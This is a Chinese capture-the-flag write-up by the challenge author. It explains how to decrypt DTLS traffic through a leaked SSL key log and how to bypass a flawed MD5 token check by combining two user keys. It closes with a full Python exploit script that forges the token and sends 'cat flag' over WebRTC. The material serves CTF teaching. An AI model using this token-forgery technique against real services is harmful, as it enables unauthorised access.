https://www.ichunqiu.com/battalion?t=1&r=70899
+ + + + + + + + + + +
写在前面
打了VNCTF 2022
的选手可能会发现本文中提到的部分文件与比赛中的附件有些许出入,这是因为我在比赛的前一天试图提升难度,建立了新的附件包。但是由于整体比赛环境均已搭建完成,替换附件会带来不稳定因素,因此最后没有替换成更高难度的附件。本文所述内容以及复现环境均使用新版附件。
题目分析——发现证书体系变更
首先,我们拿到附件包,可以看到附件包中有四个文件。
这四个文件分别是:
-
aiortc
-app.py
中引用的库文件 -
app<beta版本>.py
- 部分源码 -
cmdHostory
- 部分部署命令 -
important.pcapng
- 流量包
aiortc
其实是一个开源的软件包。Github
:(https://github.com/aiortc/aiortc) 但是这里在附件里给出,说明要么此处使用了较老的版本,要么是对其中内容进行了魔改。此处我们可以使用diff
方法对两个包进行分析。首先我们下载主分支软件包,之后将其与附件中的aiortc
放置于同一目录下。运行diff aiortc/src/aiortc aiortc-main/src/aiortc -u
⚠️注意,由于
diff
的目录穿越层数有限,一般情况下只能查找一层目录。因此可以逐目录多次运行diff
。例如先尝试diff aiortc aiortc-main -u
,然后运行diff aiortc/src aiortc-main/src -u
直至核心代码目录。
此处我们仅摘取关键的diff
代码段:
-from cryptography.hazmat.primitives.asymmetric import rsa
+from cryptography.hazmat.primitives.asymmetric import ec
+from OpenSSL import SSL, crypto
-def generate_certificate(key: rsa.RSAPrivateKey) -> x509.Certificate:
+def generate_certificate(key: ec.EllipticCurvePrivateKey) -> x509.Certificate:
-key = rsa.generate_private_key(public_exponent=65537, key_size=2048, backend=default_backend())
+key = ec.generate_private_key(ec.SECP256R1(), default_backend())
这段diff
结果标明了,我将原软件包的EC
证书替换成了RSA
证书。RSA
证书我们已经很熟悉了,此处不再展开。
EC
证书与流量分析
EC
证书指使用了ECC(Elliptic Curves Cryptography,椭圆曲线密码)
技术生成的证书,与RSA
证书、SM2
证书一样,都可以用于标准SSL
通信。它的私钥文件头为:-----BEGIN EC PRIVATE KEY-----
。那么,这个证书到底会给出题人,也就是我带来怎样的问题呢,以至于我需要把它替换掉?
首先,相信各位选手对于常规TLS
的流量解密已经很熟悉了,一共有两种方式,一种是想办法获取通信过程双方的私钥,在wireshark
中添加进行解密。Wireshark 3.0.0
之前的添加方式(Edit -> Preferences -> Protocols -> TLS
):
Wireshark 3.0.0
之后虽然保留了这个入口,但实际上此方法已经弃用,新的添加方法是( Edit -> Preferences -> RSA Keys
):
但是,这个方法有一个致命的问题,那就是,这个方法基于一个大前提,那就是双方的SSL
通信密文必须能被这个密钥所解密。这听起来像一句废话,SSL
通信的基础就是公私钥加密体制,怎么可能不能被私钥解密呢。这里我们就要提到DH
密钥交换算法了。
DH
密钥交换算法
DH
密钥交换算法指Diffie-Hellman
密钥协商算法,过程如下:
限于篇幅,此处我们不展开密码学原理,有兴趣的读者可以自行查阅资料。只需要明确一点,在DH
算法中,仅获取私钥时无法针对密文进行解密,而EC
整数的SSL
通信就使用了此算法。 这一点在wireshark
官网其实也有提到,以下摘自wireshark wiki(Google 翻译提供译文)
: 当提供适当的秘密时,Wireshark
支持 TLS
解密。 两种可用的方法是:
-
使用每个会话秘密的密钥日志文件( https://wiki.wireshark.org/TLS#using-the-pre-master-secret )。 -
使用 RSA
私钥解密。 密钥日志文件是一种始终启用解密的通用机制,即使正在使用Diffie-Hellman (DH)
密钥交换也是如此。RSA
私钥仅在有限的情况下有效。 关键日志文件是Firefox
、Chrome
和curl
等应用程序在运行时生成的文本文件。SSLKEYLOGFILE
环境变量已设置。 准确地说,它们的底层库(NSS
、OpenSSL
或boringssl
)将所需的每个会话机密写入文件。 随后可以在Wireshark
中配置此文件(https://wiki.wireshark.org/TLS#using-the-pre-master-secret )。
RSA
私钥文件只能在以下情况下使用:
-
服务器选择的密码套件未使用 (EC)DHE
。 -
协议版本为 SSLv3
,(D)TLS 1.0-1.2
。 它不适用于TLS 1.3
。 -
私钥与 服务器 证书匹配。 它不适用于 客户端 证书,也不适用于证书颁发机构 ( CA
) 证书。 -
会议尚未恢复。 握手必须包含 ClientKeyExchange 握手消息。 通常建议使用密钥日志文件,因为它适用于所有情况,但需要持续从客户端或服务器应用程序导出机密信息的能力。 RSA
私钥的唯一优点是它只需要在Wireshark
中配置一次即可启用解密,但受到上述限制。
这里我们看到,WireShark
声明,使用密钥日志文件可以解密通过DH
算法生成的TLS
密文。但是很遗憾,经过测试,使用ECC
的DTLS
协议在使用ssl.log
时无法进行解密。
题目分析——发现SSL Log位置
好了,我们回到题目,现在我们发现了证书体系的变更,也知道了变更后如果我们可以获得RSA
私钥或者SSL Log
就可以解密TLS
流量了。再看一眼diff
分析的结果,还有这样的一处变更:
@@ -46,42 +40,25 @@
logger = logging.getLogger(__name__)
-assert lib.OpenSSL_version_num() >= 0x10002000, "OpenSSL 1.0.2 or better is required"
-# Log TLS secrets to a file, similar to browsers
-SSLKEYLOGFILE = os.getenv('SSLKEYLOGFILE')
-if SSLKEYLOGFILE:
- logger.warning('Logging all TLS keys to %s', SSLKEYLOGFILE)
+def DTLSv1_get_timeout(self):
+ ptv_sec = SSL._ffi.new("time_t *")
+ ptv_usec = SSL._ffi.new("long *")
+ if SSL._lib.Cryptography_DTLSv1_get_timeout(self._ssl, ptv_sec, ptv_usec):
+ return ptv_sec[0] + (ptv_usec[0] / 1000000)
+ else:
+ return None
-class DtlsError(Exception):
- pass
这一处变更意味着如果我们能找到SSLKEYLOGFILE
这个环境变量,且能下载那个文件,我们就能解密流量了。
运行grep "SSLKEYLOGFILE" cmdHostory -n
发现有两处路径
进一步查看cmdHostory
文件内的上下文进行分析
显然这个进入docker
内的环境变量才是我们想要的。
题目分析——下载部分的源码分析
现在,我们分析题目给出的残破源码。首先基于前面的分析,我们现在迫切的需要找到一个下载点来解密流量,我们注意到源码中有如下片段:
async def download(request):
query = query_parse(request)
if query == None or 'file' not in query.keys():
content = "PDC 已经记录了您这次访问行为,普通民众请勿随意访问此系统!"
return web.Response(status=403, content_type="text/html", text=content)
filename = query.get('file')
file_dir = '<beta版本尚未提供>'
file_path = os.path.join(file_dir, filename)
if filename != '<beta版本尚未提供>':
content = "PDC 已经记录了您这次访问行为,普通民众请勿随意访问此系统!"
return web.Response(status=403, content_type="text/html", text=content)
if os.path.exists(file_path):
async with aiofiles.open(file_path, 'rb') as f:
content = await f.read()
if content:
response = web.Response(
content_type='application/octet-stream',
headers={'Content-Disposition': 'attachment;filename={}'.format(filename)},
body=content)
return response
else:
return web.Response(status=404, content_type="text/html", text="文件为空")
else:
return web.Response(status=404, content_type="text/html", text="文件未找到")
分析可知,我们可以通过http://ip:port/download?file=<filename>
来下载文件,但是只能下载指定目录下的指定文件,此处可以尝试使用我们之前分析发现的http://ip:port/download?file=ssl.log
来下载,会发现下载成功。
题目分析——流量分析
如果我们打开过页面,会发现关键路径tell2me
,打开流量包使用字符串查找:
现在我们找到了关键IP
和端口,在wireshark
首选项将23333
加入http
端口
在加入ip.addr == 121.4.47.87
过滤条件,就可以滤去大量的干扰流量了。现在我们可以通过流量分析获取基本的交互流程:
-
首先访问 tell2me
,传递三个参数sdp、type、token
: -
随后双方建立 DTLS
信道,在此信道中,首先发送ls
。 -
之后还没收到回复就直接发送了 cat flag
。 -
之后连续收到了两个回复,分别是 server.py flag
: -
以及 cat: flag: Permission denied
:
OK,到这里可能还是有些云里雾里,此时我们回去继续看源码。
题目分析——主逻辑部分的源码分析(PKSK)
接下来我们来看主逻辑,首先第一个代码逻辑:
try:
params = await request.json()
except json.decoder.JSONDecodeError:
content = "PDC 已经记录了您这次访问行为,普通民众请勿随意访问此系统!"
return web.Response(status=403, content_type="text/html", text=content)
if "token" not in params.keys():
content = "PDC 已经记录了您这次访问行为,普通民众请勿随意访问此系统!"
return web.Response(status=403, content_type="text/html", text=content)
else:
submitToken = str(params["token"])
if len(submitToken) < 32 + 13 + 5:
content = "PDC 已经记录了您这次攻击行为!"
return web.Response(status=403, content_type="text/html", text=content)
else:
pk = submitToken[45:]
sk = ""
for pkKey in pk2sk.keys():
if pkKey in pk:
sk = pk2sk[pkKey]
if sk == "":
content = "PDC 已经记录了您这次攻击行为!"
return web.Response(status=403, content_type="text/html", text=content)
else:
timeStamp = int(round(time.time()) * 1000)
signText = f"{submitToken[32:45]}-{sk}"
md5Object = hashlib.md5()
md5Object.update(signText.encode())
if md5Object.hexdigest().upper() != submitToken[:32]:
content = "PDC 已经记录了您这次攻击行为!"
return web.Response(status=403, content_type="text/html", text=content)
elif(timeStamp - int(submitToken[32:45]) < 600000):
if submitToken[45:50] == '?????':
这是一个简单的PK-SK
验签机制实现,首先确保传入参数同时满足以下三个条件:
-
是 JSON
格式且不存在语法错误 -
存在 token
字段 -
token
字段长度大于50
字节 之后按长度进行拆分,其中最后一部分内容为不定长的PK
,服务端维护PK-SK
的映射表。依次遍历映射表,如果服务端PK
是Client
传来的PK
的子集,则认为应当使用此PK
对应的SK
,之后如果再次命中,则使用新的SK
。可以看到这个逻辑其实很奇怪,明明是直接sk=pk2sk[pk]
就能解决的问题,结果实现的这么奇怪,大史说过“邪乎到家必有鬼”,所以这里其实就是漏洞点。
好,首先,源码一开始,我们可以看到一个字典,定义为:
pk2sk = {"?????":"<beta版本尚未提供>","?????":"8d509c28896865f8640f328f30f15721"}
流量中传入的token
是
2D041B4B9AA98AFAB545FE0F4651E7951674991453000weisi
那么,如果weisi
代表书中人物常伟思,那么,我们可以合理推断完善字典定义为:
pk2sk = {"luoji":"<beta版本尚未提供>","weisi":"8d509c28896865f8640f328f30f15721"}
那么其实我们有了一个验证的途径,按源码分拆token
:
timeStamp = 1674991453000
pk = weisi
signText = 2D041B4B9AA98AFAB545FE0F4651E795
我们只需要计算md5("1674991453000-8d509c28896865f8640f328f30f15721")
是否等于signText
就可以证明我们的论断是否正确。
显然正确。那么,我们假定,pk的内容是luojiweisi
,想想看会发生什么。程序会首先使用罗辑的sk
,但是循环没有停止,程序会读取伟思的sk
覆盖并最终使用此sk
进行验签。当然,就算我们可以通过验签,最终我们的pk
会是奇怪的luojiweisi
,理论上通过不了后续权限才对。我们来看最后一行:
if submitToken[45:50] == '?????':
也就是说,权限验证时会忽略超出50
个字节的内容,这就使得我们可以以罗辑的身份通过检查。
题目分析——主逻辑部分的源码分析(拿到flag)
最后,我们来看最终的通过了权限验证之后的逻辑:
if submitToken[45:50] == '?????':
if "sdp" not in params.keys() or "type" not in params.keys():
content = "您好,?????!"
return web.Response(content_type="text/html", text=content)
else:
offer = RTCSessionDescription(sdp=params["sdp"], type=params["type"])
pc = RTCPeerConnection()
pcs.add(pc)
@pc.on("datachannel")
<beta版本尚未提供>
@pc.on("connectionstatechange")
<beta版本尚未提供>
<beta版本尚未提供>
return web.Response(
content_type="application/json",
text=json.dumps(
{"sdp": pc.localDescription.sdp, "type":pc.localDescription.type}
),
)
elif submitToken[45:50] == '?????':
if "sdp" not in params.keys() or "type" not in params.keys():
content = "您好,?????!"
return web.Response(content_type="text/html", text=content)
else:
offer = RTCSessionDescription(sdp=params["sdp"], type=params["type"])
pc = RTCPeerConnection()
pcs.add(pc)
@pc.on("datachannel")
<beta版本尚未提供>
@pc.on("connectionstatechange")
<beta版本尚未提供>
<beta版本尚未提供>
return web.Response(
content_type="application/json",
text=json.dumps(
{"sdp": pc.localDescription.sdp, "type":pc.localDescription.type}
),
)
这段代码实际上是想提示两点:
-
无论登录的身份是什么,实际上都会走 webRTC
建立后续的信道进行通信。 -
可以参考 aiortc
官方提供的example
,本题实现没有过多改动。联想到之前流量分析时提示的是无权限读flag
,那么我们其实只要以伟思的身份传token
再正常建立一个WebRTC Client
重发xiaolanlan:cat flag
就可以拿到flag
了。
EXP
import requests
import time
import json
import hashlib
import asyncio
import argparse
from aiortc import RTCIceCandidate, RTCPeerConnection, RTCSessionDescription
from aiortc.contrib.signaling import BYE, add_signaling_arguments, create_signaling
from aiortc.sdp import candidate_from_sdp, candidate_to_sdp
from cryptography.hazmat.primitives import serialization
time_start = None
pk = "luojiweisi"
sk = "8d509c28896865f8640f328f30f15721"
url = "http://url/tell2me"
def object_to_string(obj):
if isinstance(obj, RTCSessionDescription):
message = {"sdp": obj.sdp, "type": obj.type}
elif isinstance(obj, RTCIceCandidate):
message = {
"candidate": "candidate:" + candidate_to_sdp(obj),
"id": obj.sdpMid,
"label": obj.sdpMLineIndex,
"type": "candidate",
}
else:
assert obj is BYE
message = {"type": "bye"}
return message
def object_from_string(message_str):
message = json.loads(message_str)
if message["type"] in ["answer", "offer"]:
return RTCSessionDescription(**message)
elif message["type"] == "candidate" and message["candidate"]:
candidate = candidate_from_sdp(message["candidate"].split(":", 1)[1])
candidate.sdpMid = message["id"]
candidate.sdpMLineIndex = message["label"]
return candidate
elif message["type"] == "bye":
return BYE
def channel_log(channel, t, message):
print("channel(%s) %s %s" % (channel.label, t, message))
def channel_send(channel, message):
channel_log(channel, ">", message)
channel.send(message)
def current_stamp():
global time_start
if time_start is None:
time_start = time.time()
return 0
else:
return int((time.time() - time_start) * 1000000)
async def consume_signaling(pc, signaling):
while True:
obj = await signaling.receive()
if isinstance(obj, RTCSessionDescription):
await pc.setRemoteDescription(obj)
if obj.type == "offer":
# send answer
await pc.setLocalDescription(await pc.createAnswer())
await signaling.send(pc.localDescription)
elif isinstance(obj, RTCIceCandidate):
await pc.addIceCandidate(obj)
elif obj is BYE:
print("Exiting")
break
def sendSDPRequest(WRTCConnectionInfo):
timeStamp = int(round(time.time()) * 1000)
signText = f"{timeStamp}-{sk}"
md5Object = hashlib.md5()
md5Object.update(signText.encode())
signValue = md5Object.hexdigest().upper()
WRTCConnectionInfo["token"] = f"{signValue}{timeStamp}{pk}"
res = requests.post(url,json=WRTCConnectionInfo)
return res.text
async def run_offer(pc, signaling):
await signaling.connect()
channel = pc.createDataChannel("chat")
async def send_ls():
channel_send(channel, f"xiaolanlan:ls")
await asyncio.sleep(1)
async def send_cat_flag():
channel_send(channel, f"xiaolanlan:cat flag")
await asyncio.sleep(1)
@channel.on("open")
def on_open():
print("Connect Open!")
asyncio.ensure_future(send_ls())
asyncio.ensure_future(send_cat_flag())
@channel.on("message")
def on_message(message):
channel_log(channel, "<", message)
# send offer
await pc.setLocalDescription(await pc.createOffer())
sdpResponse = sendSDPRequest(object_to_string(pc.localDescription))
# await signaling.send(pc.localDescription)
obj = object_from_string(sdpResponse)
if isinstance(obj, RTCSessionDescription):
await pc.setRemoteDescription(obj)
if obj.type == "offer":
# send answer
await pc.setLocalDescription(await pc.createAnswer())
await signaling.send(pc.localDescription)
elif isinstance(obj, RTCIceCandidate):
await pc.addIceCandidate(obj)
elif obj is BYE:
print("Exiting")
await consume_signaling(pc, signaling)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
add_signaling_arguments(parser)
args = parser.parse_args()
signaling = create_signaling(args)
pc = RTCPeerConnection()
private_key = pc._RTCPeerConnection__certificates[0]._key
public_key = private_key.public_key()
rsa_pem = private_key.private_bytes(encoding=serialization.Encoding.PEM,format=serialization.PrivateFormat.TraditionalOpenSSL,encryption_algorithm=serialization.NoEncryption())
coro = run_offer(pc, signaling)
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(coro)
except KeyboardInterrupt:
pass
finally:
loop.run_until_complete(pc.close())
loop.run_until_complete(signaling.close())
后记
限于篇幅,WebRTC
的相关知识此处就不展开了,作为一个比较成熟的协议,网上关于它的分析也有很多,再加上本题主要是用它作为一个正向的工具,而非是利用它的漏洞,也不必展开。(但是万一后面我会基于这个出pwn
也说不准嘿嘿)总之最后给大家说几点问题吧:
-
第一点也是最重要的一点,由于 webRTC
在实现时,会调用内核能力自动选择可用的UDP
端口进行信道建立,这使得我们无法使用单一端口映射的方式部署,而端口区间映射也容易导致打不通,所以最优解是使用host
模式部署,与宿主机共享端口,独占VPS
,这里也再次感谢春秋GAME提供资源,给各位CTFer
一个复现的机会。 -
另外, WebRTC
作为P2P
长连接通信,会涉及Server
反连,WebRTC
本身支持TUN/STUN
方式进行内网穿透。因此,各位选手无需进行额外设置,在本地即可打通,但是仍需注意的是,部分公司/学校会将内网穿透认定为违规行为,利用TUN/STUN
方式进行内网穿透是极容易被检测到的行为。因此,若您的公司/学校有相关规定,请勿在其办公网/校园网进行本赛题的复现。 -
最后由于内网穿透本身的不稳定性,有可能会反连失败,因此,如果你的 EXP
打不通,请积极重试。(卡在上图红框位置就是反连失败了) -
运行脚本时,请注意使用随附件给出的 aiortc
版本,否则可能会导致SSL
证书链算法不兼容导致TLS
握手失败。(如果这句看不懂,请重读本文"题目分析——发现证书体系变更"一节)
+ + + + + + + + + + +
春秋GAME伽玛实验室
会定期分享赛题赛制设计、解题思路……
如果你日常有一些技术研究和好的设计思路
或在赛后对某道题有另辟蹊径的想法
欢迎找到春秋GAME投稿哦~
联系vx:cium0309
欢迎加入 春秋GAME CTF交流2群


原文始发于微信公众号(春秋伽玛):伽玛实验场 | PDC面壁计划管理系统-出题人视角